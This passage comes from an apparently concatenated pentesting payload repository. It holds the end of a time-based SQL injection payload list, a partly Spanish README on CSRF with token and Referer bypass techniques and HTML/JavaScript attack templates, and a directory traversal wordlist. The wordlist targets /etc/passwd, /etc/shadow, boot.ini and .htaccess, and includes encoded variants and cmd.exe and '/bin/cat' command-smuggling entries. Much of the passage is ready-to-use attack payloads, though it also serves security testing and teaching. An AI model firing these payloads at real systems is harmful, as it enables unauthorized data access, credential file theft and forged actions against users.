',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 142 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 143 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 144 | 
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 145 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 146 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 147 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 148 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 149 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 150 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 151 | -------------------------------------------------------------------------------- /Web Application/CSRF/README.md: -------------------------------------------------------------------------------- 1 | # CSRF 2 | 3 | La falsificación de solicitudes entre sitios (también conocida como CSRF) es una vulnerabilidad de seguridad web que permite a un atacante inducir a los usuarios a realizar acciones que no pretenden realizar. Por ejemplo, un atacante podría eludir parcialmente la misma política de origen (SOP), que está diseñada para evitar que diferentes sitios web interfieran entre sí. 
4 | 5 | ## Summary 6 | 7 | * [PreRequisitos](#prerequisitos) 8 | * [Methodology](#methodology) 9 | * [Payloads](#payloads) 10 | * [Técnicas](#tecnicas) 11 | * [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction) 12 | * [HTML GET - No User Interaction](#html-get---no-user-interaction) 13 | * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction) 14 | * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction) 15 | * [JSON GET - Simple Request](#json-get---simple-request) 16 | * [JSON POST - Simple Request](#json-post---simple-request) 17 | * [JSON POST - Complex Request](#json-post---complex-request) 18 | * [Defenses](#defenses) 19 | 20 | 21 | 22 | ## PreRequisitos: 23 | 24 | Debes encontrar una funcionalidad relevante de la aplicación (change password or email, make the victim follow you on a social network, give you more privileges, etc.) 25 | 26 | ### Para que un ataque CSRF sea posible, se deben cumplir tres condiciones clave: 27 | 28 | - Una acción relevante. Hay una acción dentro de la aplicación que el atacante tiene una razón para inducir. Esta puede ser una acción privilegiada (como modificar permisos para otros usuarios) o cualquier acción sobre datos específicos del usuario (como cambiar la propia contraseña del usuario). 29 | 30 | - Manejo de sesiones basado en cookies. Realizar la acción implica emitir una o más solicitudes HTTP, y la aplicación se basa únicamente en las cookies de sesión para identificar al usuario que ha realizado las solicitudes. No existe ningún otro mecanismo para realizar un seguimiento de las sesiones o validar las solicitudes de los usuarios. 31 | 32 | - Sin parámetros de solicitud impredecibles. Las solicitudes que realizan la acción no contienen ningún parámetro cuyos valores el atacante no pueda determinar o adivinar.
Por ejemplo, al hacer que un usuario cambie su contraseña, la función no es vulnerable si un atacante necesita conocer el valor de la contraseña existente. 33 | 34 | ## Methodology 35 | 36 | <img src="https://user-images.githubusercontent.com/43796175/119205068-cfbd9d80-ba5c-11eb-9078-f4fea5599023.png"> 37 | 38 | ## Payloads 39 | 40 | <img src="https://user-images.githubusercontent.com/43796175/119205115-f085f300-ba5c-11eb-9f29-a11a6f0681b9.jpg"> 41 | 42 | ### Técnicas: 43 | 44 | 1. Cambiar el método de POST a GET y eliminar el token CSRF 45 | 2. Eliminar todo el parámetro del token CSRF 46 | 3. Enviar el token CSRF junto con el ataque, ya que el backend no valida que ese token en particular esté asociado a un usuario o sesión de usuario en concreto. 47 | 4. Con el User01 ejecutar la función vulnerable a CSRF (e.g. cambio de email), capturar el token y dropear la request antes de que se realice. Con el User02 repetir la misma acción y cambiar el token por el que se ha capturado previamente del User01. Luego, se actualizará el mail del usuario User02 con un token CSRF generado por el User01. 48 | 5. Verificar si existen 2 tokens de CSRF, uno en el BODY y otro en el HEADER. De ser así, comprobar que es posible realizar alguna funcionalidad de una víctima cambiando estos dos valores del ATACANTE por los dos valores de la VÍCTIMA. 49 | 6. Comprobar que coincidan los valores de la COOKIE enviada por el HEADER y por el BODY. Si el servidor sólo comprueba que estos valores sean iguales, sin importar qué valor se les asigne, entonces buscar una vulnerabilidad de CRLF para inyectar tu propio HEADER y enviar ambos valores de COOKIE idénticos. 50 | 7. Modifique el HEADER `Referer` y/o verifique si la aplicación devuelve un error como `Invalid referer header` cuando se explota, entonces elimine el HEADER `Referer` y valide si se acepta la modificación que intenta realizar.
En su exploit ingrese `<meta name="referrer" content="no-referrer">` para evitar que la aplicación valide este encabezado. 51 | 8. Si el comportamiento anterior se genera, y el servidor no acepta la request cuando se elimina el header `Referer`, entonces intente agregar el dominio esperado por el servidor dentro de otro dominio. Ejemplo: `Referer: https://test.com/ac371f561f8fc8d4c0a13d2c001400ab.web-security-academy.net/`. Luego, si se acepta la petición, cree su exploit y agregue las dos siguientes modificaciones: 52 | 1) En el header del exploit, agregue: `Referrer-Policy: unsafe-url` 53 | 2) En el body, en la línea de código donde se declara la primera etiqueta `<script>history.pushState('', '', '/')</script>`, agregue a la función `history.pushState()` la siguiente modificación para que se incluya una cadena de consulta con la URL de su instancia: `history.pushState("", "", "/?your-lab-id.web-security-academy.net")`, esto hará que el encabezado `Referer` en la solicitud generada contenga la URL del sitio de destino en la cadena de consulta. 
54 | 55 | 56 | ### HTML GET - Requiring User Interaction 57 | 58 | ```html 59 | <a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a> 60 | ``` 61 | 62 | ### HTML GET - No User Interaction 63 | 64 | ```html 65 | <img src="http://www.example.com/api/setusername?username=CSRFd"> 66 | ``` 67 | 68 | ### HTML POST - Requiring User Interaction 69 | 70 | ```html 71 | <form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST"> 72 | <input name="username" type="hidden" value="CSRFd" /> 73 | <input type="submit" value="Submit Request" /> 74 | </form> 75 | ``` 76 | 77 | ### HTML POST - AutoSubmit - No User Interaction 78 | 79 | ```html 80 | <form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST"> 81 | <input name="username" type="hidden" value="CSRFd" /> 82 | <input type="submit" value="Submit Request" /> 83 | </form> 84 | 85 | <script> 86 | document.getElementById("autosubmit").submit(); 87 | </script> 88 | ``` 89 | 90 | 91 | ### JSON GET - Simple Request 92 | 93 | ```html 94 | <script> 95 | var xhr = new XMLHttpRequest(); 96 | xhr.open("GET", "http://www.example.com/api/currentuser"); 97 | xhr.send(); 98 | </script> 99 | ``` 100 | 101 | ### JSON POST - Simple Request 102 | 103 | ```html 104 | <script> 105 | var xhr = new XMLHttpRequest(); 106 | xhr.open("POST", "http://www.example.com/api/setrole"); 107 | //application/json is not allowed in a simple request. 
text/plain is the default 108 | xhr.setRequestHeader("Content-Type", "text/plain"); 109 | //You will probably want to also try one or both of these 110 | //xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 111 | //xhr.setRequestHeader("Content-Type", "multipart/form-data"); 112 | xhr.send('{"role":admin}'); 113 | </script> 114 | ``` 115 | 116 | ### JSON POST - Complex Request 117 | 118 | ```html 119 | <script> 120 | var xhr = new XMLHttpRequest(); 121 | xhr.open("POST", "http://www.example.com/api/setrole"); 122 | xhr.withCredentials = true; 123 | xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); 124 | xhr.send('{"role":admin}'); 125 | </script> 126 | ``` 127 | 128 | 129 | ## Defenses 130 | 131 | - SameSite cookies: If the session cookie is using this flag, you may not be able to send the cookie from arbitrary web sites. 132 | 133 | - Cross-origin resource sharing: Depending on which kind of HTTP request you need to perform to abuse the relevant action, you may need to take into account the CORS policy of the victim site. Note that the CORS policy does not matter if you just want to send a GET request or a POST request from a form and you don't need to read the response. 134 | 135 | - Ask for the user's password to authorise the action. 136 | 137 | - Resolve a captcha. 138 | 139 | - Read the Referer or Origin headers. If a regex is used it could be bypassed, for example with: 140 | ``` 141 | http://mal.net?orig=http://example.com (ends with the url) 142 | http://example.com.mal.net (starts with the url) 143 | ``` 144 | - Modify the name of the parameters of the POST or GET request. 145 | 146 | - Use a CSRF token in each session. This token has to be sent inside the request to confirm the action. This token could be protected with CORS.
147 | -------------------------------------------------------------------------------- /Web Application/Directory Traversal/Intruder/directory_traversal.txt: -------------------------------------------------------------------------------- 1 | \..\WINDOWS\win.ini 2 | \..\..\WINDOWS\win.ini 3 | \..\..\..\WINDOWS\win.ini 4 | \..\..\..\..\WINDOWS\win.ini 5 | \..\..\..\..\..\WINDOWS\win.ini 6 | \..\..\..\..\..\..\WINDOWS\win.ini 7 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 8 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 9 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 10 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 11 | %5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 12 | %5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 13 | %5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 14 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 15 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 16 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 17 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 18 | ..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 19 | ..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 20 | 
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 21 | ..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 22 | ..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 23 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 24 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 25 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 26 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 27 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 28 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 29 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 30 | %2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 31 | %2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 32 | ../../../../../../../../../etc/passwd 33 | ../../../../../../../../etc/passwd 34 | ../../../../../../../etc/passwd 35 | ../../../../../../etc/passwd 36 | ../../../../../etc/passwd 37 | ../../../../etc/passwd 38 | ../../../etc/passwd 39 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 40 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 41 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 42 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 43 | 
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 44 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 45 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 46 | %2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 47 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 48 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 49 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 50 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 51 | ../../../.htaccess 52 | ../../.htaccess 53 | ../.htaccess 54 | .htaccess 55 | ././.htaccess 56 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 57 | %2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 58 | %2e%2e%2f%2e%68%74%61%63%63%65%73%73 59 | %2e%68%74%61%63%63%65%73%73 60 | %2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73 61 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 62 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 63 | %%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 64 | %%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 65 | %%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 66 | ../../../../../../../../../../../../etc/hosts%00 67 | ../../../../../../../../../../../../etc/hosts 68 | ../../boot.ini 69 | /../../../../../../../../%2A 70 | ../../../../../../../../../../../../etc/passwd%00 71 | ../../../../../../../../../../../../etc/passwd 72 | 
../../../../../../../../../../../../etc/shadow%00 73 | ../../../../../../../../../../../../etc/shadow 74 | /../../../../../../../../../../etc/passwd^^ 75 | /../../../../../../../../../../etc/shadow^^ 76 | /../../../../../../../../../../etc/passwd 77 | /../../../../../../../../../../etc/shadow 78 | /./././././././././././etc/passwd 79 | /./././././././././././etc/shadow 80 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 81 | \..\..\..\..\..\..\..\..\..\..\etc\shadow 82 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 83 | ..\..\..\..\..\..\..\..\..\..\etc\shadow 84 | /..\../..\../..\../..\../..\../..\../etc/passwd 85 | /..\../..\../..\../..\../..\../..\../etc/shadow 86 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 87 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow 88 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 89 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 90 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 91 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 92 | %0a/bin/cat%20/etc/passwd 93 | %0a/bin/cat%20/etc/shadow 94 | %00/etc/passwd%00 95 | %00/etc/shadow%00 96 | %00../../../../../../etc/passwd 97 | %00../../../../../../etc/shadow 98 | /../../../../../../../../../../../etc/passwd%00.jpg 99 | /../../../../../../../../../../../etc/passwd%00.html 100 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 101 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow 102 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 103 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow 104 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 105 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 106 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 107 | 
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini 108 | \\&apos;/bin/cat%20/etc/passwd\\&apos; 109 | \\&apos;/bin/cat%20/etc/shadow\\&apos; 110 | ../../../../../../../../conf/server.xml 111 | /../../../../../../../../bin/id| 112 | C:/inetpub/wwwroot/global.asa 113 | C:\inetpub\wwwroot\global.asa 114 | C:/boot.ini 115 | C:\boot.ini 116 | ../../../../../../../../../../../../localstart.asp%00 117 | ../../../../../../../../../../../../localstart.asp 118 | ../../../../../../../../../../../../boot.ini%00 119 | ../../../../../../../../../../../../boot.ini 120 | /./././././././././././boot.ini 121 | /../../../../../../../../../../../boot.ini%00 122 | /../../../../../../../../../../../boot.ini 123 | /..\../..\../..\../..\../..\../..\../boot.ini 124 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 125 | \..\..\..\..\..\..\..\..\..\..\boot.ini 126 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 127 | ..\..\..\..\..\..\..\..\..\..\boot.ini 128 | /../../../../../../../../../../../boot.ini%00.html 129 | /../../../../../../../../../../../boot.ini%00.jpg 130 | /.../.../.../.../.../ 131 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 132 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini --------------------------------------------------------------------------------